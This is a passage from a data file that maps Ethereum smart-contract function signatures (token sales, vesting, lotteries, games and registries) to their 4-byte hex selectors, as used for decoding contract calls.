"0xd7edddb2", "getwithdrawableAmount(address)": "0x7d087715", "getReinvestableTokenAmount(address)": "0x7fc3f49e", "reinvest(uint256)": "0x83b4918b", "SaveCryptoNetwork()": "0x69414e7b", "BlueToken()": "0xa0ef8647", "Axioms()": "0x121563ae", "HAVY()": "0xe433bb3a", "forwardETHtoSTCcontract(uint256)": "0x04f6aa30", "burnUserTokens(uint256)": "0xe3e4a1b4", "allowedToBurn(uint256)": "0x49aafad7", "totalSTC(uint256,uint256)": "0x71098e15", "sTCBonus(uint256,uint256)": "0xece62017", "changetokenBurnAddres(address)": "0xaf7c8f96", "SWAP(address,address,address)": "0xa682dd4f", "Planetagro(address)": "0x82645725", "addUserAuto()": "0xf43b1620", "MatCashToken()": "0x575ab848", "retrieveEth()": "0xd619d216", "newCustomFutureLottery(uint256,uint256,uint256,address,uint256)": "0x9b5e5d8c", "newFutureLottery(uint256,uint256,uint256)": "0xf0afbf84", "newLottery(uint256,uint256)": "0x60be3547", "fechPreAllForCandidate()": "0x28b5a8e6", "requireCorrectReceipt(uint256)": "0xf7c0fa4a", "verifyMerkleProof(uint256,uint256)": "0x800ab784", "settleBetUncleMerkleProof(uint256,uint40)": "0x74e048d5", "settleBet(uint256,bytes32)": "0xca722cdc", "gibtesnet()": "0x8c0a41f2", "checkMyTransactions()": "0x64e0bbc5", "changeMaxTransactions(uint256)": "0x1fc24caa", "_unlockContract()": "0xdf53623f", "ProjectTestToken()": "0x734a2c72", "prophecise(bytes32,bytes32)": "0x551336c5", "setSourcePrice(address)": "0x08a9ba84", "CloudexchangeCrowdsale(uint256,uint256,address)": "0xa3988500", "FindMyFish_EnterBarcode(bytes32)": "0xd94085cc", "registerBarcode(bytes32,bytes32,string,bytes32,string,bytes32,bytes32)": "0x15d9a9ee", "Bcoin()": "0xf19ab230", "privilegedBurn(uint256)": "0xad2b1e03", "createTokenVault(uint32)": "0xf69f7cab", "createTokens(uint32,address)": "0xbacef685", "vestingOf(address,uint256)": "0x6f503e67", "vestingCountOf(address)": "0x257341a8", "releasableBalanceOf(address)": "0x4f801270", "saleClosed()": "0xb8c766b8", "senderIsAdmin()": "0x621d388c", "releaseVestedTokensFor(address)": "0xc26fe7ce", "vestTokens(address,uint256,address,uint256,uint256,uint256,bool)": "0xbccb8fc0", "lockTokens(address,uint256,address,uint256)": "0x0f98a9cc", "lockReferralTokens(uint256,address,uint256)": "0x44e14e59", "lockBonusTokens(uint256,address,uint256)": "0xc4e34d46", "createSaleTokens()": "0xab90a8ac", "UrbitToken(address,address)": "0xe6662e2b", "fillUpAllowance()": "0x12d60f86", "PresaleTokenVesting(address,uint256)": "0xa5968cc6", "Alphonic()": "0x0d9e16d1", "getSingleGuessInfo(uint32)": "0xa4adcde3", "getGuessInfo(string)": "0xc03a4018", "setGuessAnswer(string)": "0x23d34f84", "splitStr2Int(string,string)": "0xad2ba325", "splitStr(string,string)": "0x12b0b627", "innerGuess(uint32,uint16,uint32,address)": "0x756e8ed3", "guess(string)": "0x4eee59b3", "setwinPercent(uint32)": "0x6f9090db", "stopGuess(uint32,bool)": "0xdd0cf7d4", "modifyGuess(uint32,uint64,uint64)": "0x00e31614", "getNextGuessId()": "0xd4793a9b", "createGuess(uint16,uint64,uint64,uint16)": "0xdaf059c6", "doAirDrop(address[],address,uint256[],uint256)": "0x2a91ab16", "auctionClose()": "0x19c2a5b5", "setOpeningClosingTime(uint256,uint256)": "0xa3dab216", "setPresaleOpeningClosingTime(uint256,uint256)": "0xaccc4a61", "setPresaleClosingTime(uint256)": "0xee216ff5", "setOpeningTime(uint256)": "0xabdd11a8", "isPresaleOn()": "0x86be53d3", "updatePresaleBonus(uint256)": "0x416c9627", "updatePresaleMaxWei(uint256)": "0x55352638", "updatePresaleMinWei(uint256)": "0xea1da8b9", "getPresaleBonusAmount(uint256)": "0xd32aba42", "releaseBonusTokens(address,uint256,address,bytes1)": "0x80b69199", "releasePrivateBonusTokens(address[],uint256[])": "0xde7c99c3", "releaseUserPrivateBonusTokens(address,uint256,address)": "0xba95df98", "releasePublicPresaleBonusTokens(address[],uint256)": "0xc53467cf", "getBonusUsersCount()": "0x0c25c6c1", "getUserBonusBalance(address)": "0xbe2671c9", "getUserBonusBalanceByType(address,bytes1)": "0x83914275", "getBonusBalanceByType(uint256,uint256,bytes1)": "0xdc45e27f", "getBonusBalance(uint256,uint256)": "0x806cdc0b", "lockBonusTokens(address,uint256,bytes1)": "0x3c936e97", "lockAndDeliverTokens(address,uint256,bytes1)": "0x971751af", "grantBonusTokens(address,uint256)": "0xf24f9abe", "update(address,uint16,bool)": "0x2d578304", "stock(uint16,uint16,address,uint256)": "0x626c0a45", "_updateExperience(address)": "0x4bdf7e8b", "_getFishPrice(uint16,uint16,uint8,address)": "0x9b4c1290", "_buyFillet(address,uint256,bytes)": "0xe264fc07", "sellFish(uint16,uint16,uint8,address,uint256)": "0x63cf6ffa", "setFilletPrice(uint16,uint16,uint8,uint256)": "0xae50d660", "setPrice(uint16,uint16,uint8,address,uint256)": "0x64c33c33", "_decrementTokenBalance(uint16,uint16,uint8,address,uint256)": "0x338d43f6", "_incrementTokenBalance(uint16,uint16,uint8,address,uint256)": "0x2f63e2fa", "_sendToken(address,uint256,bytes)": "0xaf00be12", "onPurchase(uint16,uint16,uint8,address,uint256)": "0xdd63133a", "getAddressFromBytes(uint8,bytes)": "0x2e51cdf6", "getRemainingUint(uint8,bytes)": "0xb6f84764", "getRemainingBytesTrailingZs(uint256,bytes)": "0x9fb14d9b", "getRemainingBytesLeadingZs(uint8,bytes)": "0xc45d32cf", "getTile(bytes)": "0x7356a8a9", "getY(bytes)": "0xc31592af", "getX(bytes)": "0xf4347267", "ShaBi()": "0x9adc15ef", "HelloToken()": "0xc4d2bac9", "checkHolderStep(address)": "0x91e0a5a0", "registHolderStep(address,uint8,address)": "0xc2944f7a", "changeStepLockFlag(bool)": "0x99645ba2", "changeTransferStep(uint8)": "0xadabc7f8", "unSell()": "0x344615ab", "trade()": "0x1f0ba6c9", "etherLock()": "0xe0f20a65", "createAndSignBBODocument(bytes,bytes,address[],uint256)": "0xb8aac3a5", "getDocuments()": "0xef2d8700", "createBBODocument(bytes32,uint256)": "0xfe3b24b1", "USTM01()": "0x80738c4d", "YOTOKEN()": "0x6fe33720", "flipPayingDoublrs(bool)": "0xf2d9f46e", "changePayoutAddress(address)": "0x0426c697", "assignedPayoutAddress()": "0xc1f77309", "createtoken(string,string,string,string,string)": "0x9a882b7a", "TokenBatchTransfer()": "0x9e69383d", "EBCoin()": "0x3998e2a9", "MarketContract()": "0xffc42904", "ZILLION()": "0x1060c965", "getSendCoin()": "0x641a5f66", "SendCoin(uint32,uint32,uint32,address)": "0xd4e77133", "setIsAdmin(address,bool)": "0xc4d259ad", "CrapToken1A()": "0x720be6c7", "updateStatus(uint256)": "0xd61e7201", "payToController()": "0xcd3de8d5", "SmartController(address)": "0x3aab3306", "cfi_whitelist(address)": "0x19e82d86", "san_whitelist(address)": "0x007aa091", "TOTAL_RECEIVED_ETH()": "0x47002c6d", "investorsCount()": "0x2b711051", "CrowdsaleMinter()": "0x02acbaa3", "rawVotes(address)": "0x00e5fc5f", "allowed(address)": "0xd63a8e11", "SimpleERC20Token()": "0xb5c8f317", "IGTMYR()": "0x77c68aa7", "setCrowdsaleTotal(uint256)": "0x9dec365e", "setCrowdsaleEndTime(uint256)": "0x00ebc96e", "setCrowdsaleStartTime(uint256)": "0x0967cff0", "internalSellTokenFromAdmin(address,uint256,bool,uint256)": "0x1d8c7c20", "getAccountLockState(address)": "0xd86f8ccd", "getAccountUnlockTime(address)": "0xc92015f6", "lockInternalAccount(address,bool,uint256)": "0x5a4071fe", "setEnableInternalLock(bool)": "0x9bcf7352", "transferFromAdmin(address,address,uint256)": "0x0d271720", "setAllowTransfers(bool)": "0xdf50afa4", "setExchangeStatus(bool,bool)": "0x88f7c6d6", "setExchangeRate(uint256,uint256)": "0xf55ecf06", "transferETH()": "0xe28d717b", "setEthFundDeposit(address)": "0xd9037441", "decreaseSoldSaleSupply(uint256)": "0x41799883", "increaseSoldSaleSupply(uint256)": "0x9061a6e9", "_isUserInternalLock()": "0xb273952a", "MSCE()": "0xed8fee35", "MainToken()": "0xf5194ae2", "mintAndFreeze(address,uint256,uint64)": "0x0bb2cd6b", "freeze(address,uint64)": "0xacb88986", "toKey(address,uint256)": "0x11728ecf", "releaseAll()": "0x5be7fde8", "releaseOnce()": "0x66a92cda", "freezeTo(address,uint256,uint64)": "0x3be1e952", "getFreezing(address,uint256)": "0x02d6f730", "freezingCount(address)": "0xca63b5b8", "freezingBalanceOf(address)": "0xd8aeedf5", "actualBalanceOf(address)": "0x17a950ac", "burn(uint256,bytes)": "0xfe9d9303", "doSend(address,address,uint256,bytes,address,bytes,bool)": "0x7e95d2f6", "callRecipient(address,address,address,uint256,bytes,bytes,bool)": "0xc3458d18", "callSender(address,address,address,uint256,bytes,bytes)": "0x647dd08c", "isRegularAddress(address)": "0xa896d92d", "requireMultiple(uint256)": "0x489acecc", "operatorSend(address,address,uint256,bytes,bytes)": "0x62ad1b83", "revokeOperator(address)": "0xfad8b32a", "authorizeOperator(address)": "0x959b8c3f", "sendByCheque(address,uint256,bytes,uint256,uint8,bytes32,bytes32)": "0x398427e6", "send(address,uint256,bytes)": "0x9bd9bbc6", "tokensReceived(address,address,address,uint256,bytes,bytes)": "0x0023de29", "tokensToSend(address,address,address,uint256,bytes,bytes)": "0x75ab9782", "delegateManagement(address)": "0x4fecf22d", "interfaceAddr(address,string)": "0x449a09a4", "setInterfaceImplementation(string,address)": "0xe6f6b789", "SaintCoinWorld()": "0x1a844205", "Ticket(address)": "0xcc4e0008", "etherProceeds()": "0x801aba56", "FJH()": "0x5851bc4f", "Bothereum(uint256,string,string)": "0xac74f2a8", "RCCCToken()": "0x2a437269", "safeWithdrawal(uint256)": "0x5f56b6fe", "EYHToken()": "0x9777a30e", "WithCoin()": "0xd8392c92", "DAOstackPreSale(address,uint256,uint256)": "0x73e55a57", "_setLimits(uint256,uint256)": "0x6893e8d2", "withinLimits(uint256)": "0xd48d02f6", "BuyLimits(uint256,uint256)": "0x50d17749", "TranslateME()": "0x7cdf6d0b", "getTradingPairCutoffs(address,address,address)": "0x70c55e1f", "verifySignature(address,bytes32,uint8,bytes32,bytes32)": "0x02bf9e7f", "isAddressAuthorized(address)": "0xced3fb9c", "batchTransferToken(address,address,bytes32[])": "0x8a8bf82a", "transferToken(address,address,address,uint256)": "0x2c54de4f", "getLatestAuthorizedAddresses(uint256)": "0x2097dd04", "deauthorizeAddress(address)": "0xf73857cc", "getTokens(uint256,uint256)": "0x494cfc6c", "isTokenRegistered(address)": "0x26aa101f", "isTokenRegisteredBySymbol(string)": "0xfcd45807", "getAddressBySymbol(string)": "0x1605dd61", "areAllTokensRegistered(address[],address)": "0x6970402c", "unregisterToken(address,string)": "0x0b03ad11", "registerToken(address,string)": "0xd4fbeb19", "stringToBytes12(string)": "0xafc0e324", "isNameValid(string)": "0x05d430db", "getParticipantIds(string,uint256,uint256)": "0x32a8bb33", "removeParticipant(uint256)": "0x683f7f27", "unregisterName(string)": "0x0250bd2d", "registerName(string)": "0x0830602b", "submitRing(address[3][],address,uint256[7][],uint256,uint8[1][],uint8,bool[],uint8[],bytes32[],bytes32[],uint256,uint16)": "0x2bde41e1", "cancelAllOrders(uint256)": "0xbd545f53", "cancelAllOrdersByTradingPair(address,address,uint256)": "0x8865cbd6", "cancelOrder(address[4],uint256[7],bool,uint8,uint8,bytes32,bytes32)": "0x8bc12fd1", "xorReduce(bytes32[],uint256)": "0xf75fa5e1", "cvsquare(uint256[],uint256)": "0xb43216bf", "tolerantSub(uint256,uint256)": "0x22e465ee", "xorReduce(uint8[],uint256)": "0x3ca7aad7", "ZJLTToken()": "0x6e3bbebd", "transferForMultiAddresses(address[],uint256[])": "0x204009d2", "TokenERC20(uint256,string,string,uint8)": "0x3b44383f", "CONUNToken(uint256,string,uint8,string)": "0x045f8aad", "setCap(address,uint256)": "0x80ad2cf3", "finalRate()": "0x21106109", "initialRate()": "0x9e51051f", "finalized()": "0xb3f05b97", "tokenWallet()": "0xbff99c6c", "_isValidDataHash(bytes32,bytes)": "0x5f9590fc", "_isValidSignatureAndData(address,bytes)": "0x3d7daab3", "_isValidSignatureAndMethod(address,bytes)": "0x352e0891", "_isValidSignature(address,bytes)": "0x6927bc38", "migrateAll(address)": "0x5a8cadb1", "newToken()": "0xc42bd05a", "legacyToken()": "0x13155455", "revoked(address)": "0xfa01dc06", "revocable()": "0x872a7810", "cliff()": "0x13d033c0", "_addPayee(address,uint256)": "0x6ae6921f", "payee(uint256)": "0x8b83209b", "released(address)": "0x9852595c", "shares(address)": "0xce7c2ac2", "totalReleased()": "0xe33b7de3", "_asyncTransfer(address,uint256)": "0x1bddcf48", "withdrawPayments(address)": "0x31b3eb94", "verify(bytes32[],bytes32,bytes32)": "0x5a9a49c7", "_removeSigner(address)": "0x24d29cfb", "renounceSigner()": "0xe5c8b03d", "_removePauser(address)": "0xddc8d7a6", "renouncePauser()": "0x6ef8d66d", "addPauser(address)": "0x82dc1ec4", "isPauser(address)": "0x46fbf68e", "_removeMinter(address)": "0x210c5a56", "renounceMinter()": "0x98650275", "_removeCapper(address)": "0x5b10b796", "renounceCapper()": "0x5d5576f8", "addCapper(address)": "0x8dfbcf36", "isCapper(address)": "0x39564561", "_checkAndCallSafeTransfer(address,address,uint256,bytes)": "0x9e925746", "_isApprovedOrOwner(address,uint256)": "0x4cdc9549", "mintWithTokenURI(address,uint256,string)": "0x50bb4e7f", "decreaseAllowance(address,uint256)": "0xa457c2d7", "releaseTime()": "0xb91d4001", "LargeFunction()": "0x4002d3fd", "triggerAllRefunds()": "0xa755a47e", "triggerRselfdestructRefund()": "0xfb0fcd8c", "triggerRsclearRefund()": "0x3a618d26", "firstAddressFromDeployer(address)": "0xd6ecb38a", "addressToURI(address)": "0xaa74c9fc", "bytecodeAt(address)": "0x1ce7eff3", "ownershipTransferred(address)": "0xac9a252a", "BonusCrowdsaleImpl(uint256,uint256,uint256,address)": "0xf6577774", "TokensCappedCrowdsaleImpl(uint256,uint256,uint256,address,uint256)": "0x5aaa250a", "PausableCrowdsaleImplUnpaused(uint256,uint256,uint256,address)": "0xa8e48a7e", "PausableCrowdsaleImplPaused(uint256,uint256,uint256,address)": "0xfe2830d3", "BurnableTokenWrapper(address)": "0x80b525ce", "StandardTokenWrapper(address)": "0x265dcbd3", "BasicTokenWrapper(address)": "0xa08f8428", "StandardTokenImpl()": "0xeac257dc", "BasicTokenImpl()": "0xdbd8c25f", "decreaseApproval(uint256,address,uint256)": "0xbb88c016", "increaseApproval(uint256,address,uint256)": "0xc9101f6c", "transferAllowed_(uint256,address,address,uint256)": "0x37d45088", "transfer_(uint256,address,address,uint256)": "0x82043443", "finishMintingToken(uint256)": "0x2bd5a48d", "setTokenMinter(uint256,address)": "0x2505f349", "mint(uint256,address,uint256)": "0x836a1040", "reclaimBySender(uint256,address,address,bytes32)": "0x9429d441", "reclaimByReceiver(uint256,address,bytes32)": "0x6da72e7a", "fixAddress(address,bytes32)": "0xe5ffeaf6", "reclaimBySender(address,address,bytes32)": "0x694c00d1", "reclaimByReceiver(address,bytes32)": "0xde1955df", "invest(address,uint256,bytes)": "0xa502bfbd", "invest(address,bytes)": "0xc84eb9e5", "kickOwner(address)": "0xab582eb3", "finishInvesting()": "0xb75f4084", "removeOwnersWithHowMany(address[],uint256)": "0x1f18e56e", "addOwnersWithHowMany(address[],uint256)": "0x3e41d5eb", "resignOwnership()": "0xed0c7091", "cancelOperation(bytes32)": "0xbeadf957", "_setHowManyOwnersDecide(uint256)": "0xcba4bc94", "_cancelOperation(bytes32,address)": "0xc8e2190d", "_voteAndCheck(uint256)": "0xaf81bd03", "_deleteOperation(bytes32)": "0x8aac1708", "allOwnerOperations(address)": "0x482d3af0", "ownerOperationsAt(address,uint256)": "0x2c8c047a", "ownerOperationsLength(address)": "0xdf19df5d", "allOperations()": "0x2c629299", "operationAt(uint256)": "0x09c76571", "operationsLength()": "0xbb24f0dc", "allOwners()": "0xa12a52dc", "ownerAt(uint256)": "0x24359879", "ownersLength()": "0xb18f1943", "ERC721TokenMock()": "0x8503a6bf", "CATCrowdsale(uint256,uint256,uint256,address,address,address)": "0x831dc22c", "verifyTx(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[])": "0xc8e6ba4d", "Verifier(uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[])": "0xa3f3dd32", "challenge(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[])": "0xcd1b9311", "submit(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[])": "0x8d399ce3", "challengingInput()": "0xec27bdd3", "trustedInput()": "0xe0457049", "Midwife()": "0xb9499cd6", "consumesGas()": "0x3580031a", "getDeployTime()": "0xa275ee1b", "myTime()": "0x655d225f", "PalletOneToken()": "0x3db13fec", "CollectERC20(address,uint256)": "0x71ea3aad", "Suggest(string)": "0x0e21fce3", "transferTokensManual(address,uint256)": "0x367265fb", "DatCrowdPreSale(address)": "0x82c8ac27", "transferFromContract(address,uint256)": "0x1a88f306", "EtherGoToken()": "0x5270aa7d", "FXNOW()": "0x1db05ab8", "getPuppyAttributes(uint256)": "0x3268215c", "getPuppy(uint256)": "0xf36c83f0", "PuppiesCore()": "0xd9249e7e", "createGen0Auction(uint256,uint16,uint16,uint16,uint16,uint16)": "0x3ac9a77a", "createPromoPuppy(uint256,address,uint16,uint16,uint16,uint16)": "0x6b7d9a5c", "createPuppySiringAuctiona(uint256,uint256,uint256,uint256)": "0x8b587b82", "createPuppySaleAuction(uint256,uint256,uint256,uint256)": "0x24280cc4", "setPuppySports(address,address)": "0x60f8bbb8", "setMaxChildCount(uint256)": "0x2eae0018", "setMinChildCount(uint256)": "0x37621da0", "_createPuppy(uint256,uint256,uint256,uint256,address,uint16,uint16,uint16,uint16)": "0x039f0e9c", "playGame(uint256,uint256,uint256)": "0x5d12ace4", "isPuppySports()": "0x10038099", "_createCountryId(uint256)": "0x975bad75", "updateCountryHoldersCount(uint256,uint256)": "0xe65f0246", "depositTo(address,uint256)": "0xffaad6a5", "changeCountryLimit(uint256,uint256)": "0xbaee193d", "updateLimitPerMonth(bytes32,uint256)": "0x1b1665ca", "updateLimitPerDay(bytes32,uint256)": "0xc07bcfdc", "updateTextForHolder(bytes32,bytes)": "0x9d471837", "changeOperational(bytes32,bool)": "0x4e9cf5b1", "removeHolderAddress(bytes32,address,address)": "0x5cce7dbb", "addHolderAddress(bytes32,address)": "0xe7d29e38", "registerHolder(bytes32,address,uint256)": "0x4ea9a27a", "addCountryCode(uint256)": "0x75151f6b", "getCountryLimit(uint256)": "0xacf7aea7", "getCountryInfo(uint256)": "0xbf981995", "isHolderOwnAddress(bytes32,address,address)": "0xc243bdee", "isRegisteredAddress(address,address)": "0x49614e91", "getHolderExternalIdByAddress(address,address)": "0x5dea19f5", "getHolderCountryCode(bytes32)": "0x5d718818", "getHolderAddresses(bytes32)": "0xdcdd6d38", "getHolderInfo(bytes32)": "0x9008d64f", "DataController(address,address)": "0xe607a638", "removeSideService(address,uint256)": "0xcc2dcd7e", "addSideService(address,uint256)": "0xb8126a3e", "updatePendingManager(address,uint256)": "0x99caf208", "updateTreasury(address,uint256)": "0x6aaab6f2", "updateProfiterole(address,uint256)": "0xb7f3ffed", "removeBurningMan(address,uint256)": "0x974b2525", "addBurningMan(address,uint256)": "0xc8c79643", "removeEmissionProvider(address,uint256)": "0x8484dc24", "addEmissionProvider(address,uint256)": "0x80af6d79", "ServiceController(address,address,address,address)": "0xdceeeae8", "_emitMonthLimitChanged(bytes32,uint256,uint256)": "0x6cfb7101", "_emitDayLimitChanged(bytes32,uint256,uint256)": "0x32ec7a4e", "_emitCountryCodeChanged(uint256,uint256,uint256)": "0xacd00dc1", "_emitCountryCodeAdded(uint256,uint256,uint256)": "0xae2b5d3b", "_emitHolderOperationalChanged(bytes32,bool)": "0x97a1d3f7", "_emitHolderRegistered(bytes32,uint256,uint256)": "0x02460d1e", "_emitHolderAddressRemoved(bytes32,address,uint256)": "0x05e6b4a4", "_emitHolderAddressAdded(bytes32,address,uint256)": "0xd4538051", "_emitOracleRemoved(bytes4,address)": "0x162856f5", "_emitOracleAdded(bytes4,address)": "0x69eac83a", "removeOracles(bytes4[],address[])": "0x0eabdab6", "addOracles(bytes4[],address[])": "0xa339aaf7", "grandTotalAllocated()": "0x2b41a901", "companyRemainingAllocation()": "0xb58ee9a3", "manualContribution(address,uint256)": "0x0a3a0531", "transferTokens(address)": "0x0c89a0df", "setAllocation(address,uint256)": "0x9076c166", "InbestDistribution(uint256,address)": "0xf9619147", "InbestToken()": "0x608e9122", "emergencyPay()": "0xa0dc6b74", "MPY(uint256,uint256)": "0xe2616387", "setWhitelistOff()": "0x2444d352", "setWhitelistOn()": "0xa277fa88", "setMinBuyPublic()": "0x6eb060ea", "setMinBuyPrivate()": "0x9c4bcaa5", "setRate333()": "0x85431ec8", "setRate340()": "0x2bf34551", "setRate347()": "0x3781d882", "setRate362()": "0x475b723a", "setRate555()": "0xaf8af39f", "setRate1666()": "0x2871b1b9", "EnkronosToken()": "0x930fed29", "CHLToken()": "0xe6fb5c4a", "removeApproval(address)": "0x7cab5e8c", "hasApproval(address,address)": "0x4488ca9b", "performTransfer(address,address,uint256,bytes)": "0xc32d946d", "Deco()": "0xd7ce330b", "KNB()": "0x99d9d1e0", "sayHello(string)": "0xc3a9b1c5", "registerContest()": "0x668cc7d8", "rakesOwing(address)": "0x350604f1", "payRakeInternal(address,uint256)": "0x303c2569", "payRake(uint256)": "0x85cf61ef", "requestPayout(uint256)": "0x8f97e3a0", "burnUnsoldCoins()": "0x5d0ef098", "anyoneEndICO()": "0x32b3c323", "saleTeamAddress()": "0xadcd2632", "checkFunds()": "0x08d233dc", "roundThreeBlock()": "0xeec7006f", "MAXIMUM_ETHER_SPEND()": "0x23f907d9", "returnTokenOwnership()": "0xc850029e", "currentCost()": "0x368dde4b", "CharityReservesSupply()": "0xf58adfe5", "updateYearsSinceRelease()": "0x850e141a", "dateAdmin()": "0xb04ca7f0", "maxPresaleTokens()": "0x2417f31d", "minerNum()": "0x6d425249", "Rasthen()": "0x1e09e67b", "currentSale()": "0xa05d03fd", "seedInvestors()": "0x68915c14", "ToPeriod()": "0xa20348c4", "preIcoEndsAt()": "0xf40ef739", "getLastConsolationPrize()": "0x93930020", "withdrawableBalance()": "0xe62d64f6", "dateSaleEnded()": "0xbfcae563", "totalSaleLimit()": "0x15be2e7c", "astroIDPool()": "0x51fae45d", "_teamID()": "0xf4ddff1c", "remainAirdrop()": "0x3a3fdf05", "balancesRiskcoins()": "0xb9368721", "dividends_share()": "0x29c3340f", "jackpotOfHouseEdge()": "0x8242216d", "maxPendingPayouts()": "0xed62f501", "totalTokensSale()": "0x4f9b7bc8", "preSaleSecondEndDate()": "0x4b82d416", "supplyRound1()": "0xba639d5a", "mana()": "0xbdb001a7", "owlmasterReq()": "0x3f18400e", "customerDepositedEther()": "0x4d2a30c1", "voxFab()": "0x7f3ded93", "communityPeriodAmount()": "0x9333cf5e", "WALLET_FOUNDATION()": "0x77b440e9", "stage4()": "0xcd3882d5", "mainSaleStart()": "0x4220324b", "releaseTotal()": "0x656d677e", "privateSaleMaxContrAmount()": "0xf2d2fa91", "totalPayouts()": "0x4089b170", "TEST_MODE()": "0xa4009e23", "buyStores()": "0x155949ca", "liquidationPriceWad()": "0x88cf6648", "founderTokenVesting()": "0x03d5f483", "phase5Price()": "0xd475b1ab", "allRefererTokens()": "0xa33a5225", "totalPot()": "0x24b570a9", "isFork()": "0xe039f224", "CurrentStatus()": "0xe3306a6f", "TIER3_RATE()": "0x2cb3ce8c", "roundResolved()": "0xb68cf49f", "thirdWeekTokenPrice()": "0x05c78929", "transfersAllowDate()": "0x98779240", "amountSellForOneEth()": "0x277ad1f6", "summDevelopers()": "0xc56a0ffe", "minForceOffsetAmount()": "0x75ae51ce", "priceRound1()": "0x135ed7bd", "investor_Refund()": "0xe192c4e0", "pos()": "0xc56551b6", "ipyh()": "0x5d92e5d2", "preSaleTokenExchangeRate()": "0x19055df2", "sumElements(uint8[])": "0x4940c807", "icoPhase3Start()": "0xf274a828", "uniq(uint64[])": "0x2b9cb4f8", "xTokenPercent_()": "0x881b2666", "teamAdvisorsReserveTokensAddress()": "0x296d84d5", "gupToken()": "0x9971c6ce", "crowdFundAddress()": "0x5154865a", "_maxTokenSoldICO()": "0x70720fe4", "kvtToken()": "0x3822de0f", "deposito()": "0x7af327a0", "ecosystemPercentOfTotal()": "0xcd46abe4", "MIN_BID_FRAC_BOT()": "0x21ab561d", "TOKENS_PER_ETHER()": "0x6b4a6ded", "blinc_block()": "0xed25ba8c", "charityFoundationIdx()": "0x3ddc3277", "bountyDistributorAddress()": "0xa745ec70", "ICO_state()": "0x8f2e695c", "pollBurnCompleted()": "0x6eeb553f", "depth()": "0x631c56ef", "PROMOTION_PROGRAM()": "0xbb22d75c", "allocateFundToken()": "0x86c02e88", "purchaserCount()": "0x1101eaaf", "casino()": "0x9403e8dd", "foundersBalance()": "0x7afcb524", "partner2_name()": "0xc35740f9", "PRICE_CUTOFF()": "0xf2e34909", "suspendedUntil()": "0x23fa370d", "enablePreSale()": "0xc80becb6", "End8()": "0x1b7d8aaf", "amountRaisedEth()": "0x46906982", "ALLOC_MAX_PRE()": "0xdbbd9a04", "TEAM_KEEPING()": "0x22dd0d2c", "okamiMinPurchase_()": "0x57b473e2", "mainSale_TokesSold()": "0x9b9be9cb", "queuedAmount()": "0x7353a21d", "selfOn()": "0x95b537d5", "tokenExchangeRatePreSale()": "0x8b40594d", "getHKGOwned()": "0xb7c54c6f", "buyUFT(address)": "0x6d59c3be", "canContribute()": "0x40b98253", "seedEnded()": "0xb5936da2", "seedStarted()": "0x258da4b4", "SeedSale(address)": "0xc4b06c19", "transferDaico(address)": "0x8ea74d95", "transferFromVault(address,address,uint256)": "0x463d50b8", "ufoodoToken()": "0x18bd8dcb", "supplySeed()": "0x80d95b42", "TazitToken()": "0x984a74f7", "AngleToken()": "0x6949e1d4", "vendingCreateCollectible(uint256,uint256,address)": "0x2bac0b3b", "createCollectible(uint256,uint256,address)": "0x1f1e6c4e", "setVendingFee(uint256,uint256,uint256)": "0xbc37d7b8", "toggleVending(uint256,uint256)": "0x4a714378", "setMaxLimit(string,uint256,uint256,uint256)": "0x8084ee58", "Ethraffle_v4b()": "0xbbd74748", "_setGameSettings()": "0x7663265c", "tileTimeoutTimestamp(uint256,address)": "0xe801a361", "calculateBaseTimeout()": "0xaca00932", "setNextGameSettings(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x713ffc3b", "setCFO(address,bool)": "0x32f6438b", "Eth2USD_power18(uint256)": "0x91407479", "AirChn()": "0xc05374f7", "partyTo(address)": "0x063b1566", "hodlFor(uint256)": "0x2ef771ae", "hodlFor3y()": "0x35c05ab0", "hodlFor2y()": "0x3618b290", "hodlFor1y()": "0x46205ac3", "hodlersCount()": "0x1efdebb2", "get3(uint256)": "0xed09d19a", "get2(uint256)": "0x31184dc3", "get1(uint256)": "0x9c117f0f", "Break()": "0x50e72f61", "_newChallenge(uint64,uint64,address,uint256)": "0x3669acad", "_newAgon(uint64,uint64,address,uint256)": "0x547dd162", "_getExtraParam(bytes)": "0x4c4e03f2", "ActionAgonPlat(address)": "0x6df86816", "bonuscalico(uint256)": "0xfc5be8ec", "SPCoin()": "0xf9079685", "RipeXToken()": "0x1666b514", "simulate_ico()": "0x97227325", "curves(uint256)": "0x1bf7d749", "BSBCoin()": "0xf04e7476", "wakeUp(uint256)": "0x80b63e7e", "hibernate(uint256)": "0x15191c98", "evolveCryptoAvatar(uint256,uint256,uint256,uint256,uint256)": "0x70e6d387", "createCryptoAvatar(uint256,uint256,uint256,uint256,address)": "0x07cadb0f", "getCryptoAvatar(uint256)": "0x8162de9c", "stopAvatarCreation()": "0x9685e736", "changeSupervisor(address)": "0xee0c0346", "takeControl()": "0x91858734", "MeetOneCommunityBonus()": "0x73b8a8c1", "EtherHellHydrant()": "0x9fbc6a1a", "CyberCapitalInvestToken()": "0x4e14e4c8", "_OmnesCoinToken()": "0x97518f74", "Jojo(uint256,string,uint8,string)": "0x6b7f3a32", "ChillCoin()": "0x77bb5e34", "FluencePreSale(uint256,uint256,uint256)": "0xb88e8518", "multiSendEth(address[])": "0xaafafbf3", "multiSend(address,address[],uint256)": "0x5b2a0e96", "jDallyCoin()": "0xfdc967e5", "AnimeCoin()": "0x9cf21342", "RISE()": "0xd2500033", "TRE()": "0xbf9bbe71", "AllNewsCash()": "0x0ab44f74", "WEChainCommunity()": "0x0b9849ab", "GLBToken()": "0x09f5ca99", "withdraw_refund()": "0x50d7d290", "personal_withdraw(uint256)": "0x6d599136", "GechainCoin()": "0xc21191ae", "afterSaleMinting(uint256)": "0xa00c9374", "mintToTeamAndAdvisors()": "0xd0c7c635", "isCS(address)": "0xc192ca98", "setMaxTokenCap(uint256)": "0xdc6c3ee4", "setBasicRate(uint256)": "0xc4f3c097", "MooTokenSale()": "0xc5ff2069", "EverydayTokenStandardToken(uint256,string,uint8,string)": "0x4531aaa3", "updateAddresses(address,address)": "0xc1d11037", "EtheraffleLOTPromo(address,address)": "0x58439b9f", "newRegistryWithToken(uint256,string,uint8,string,uint256[],string)": "0x3d23af26", 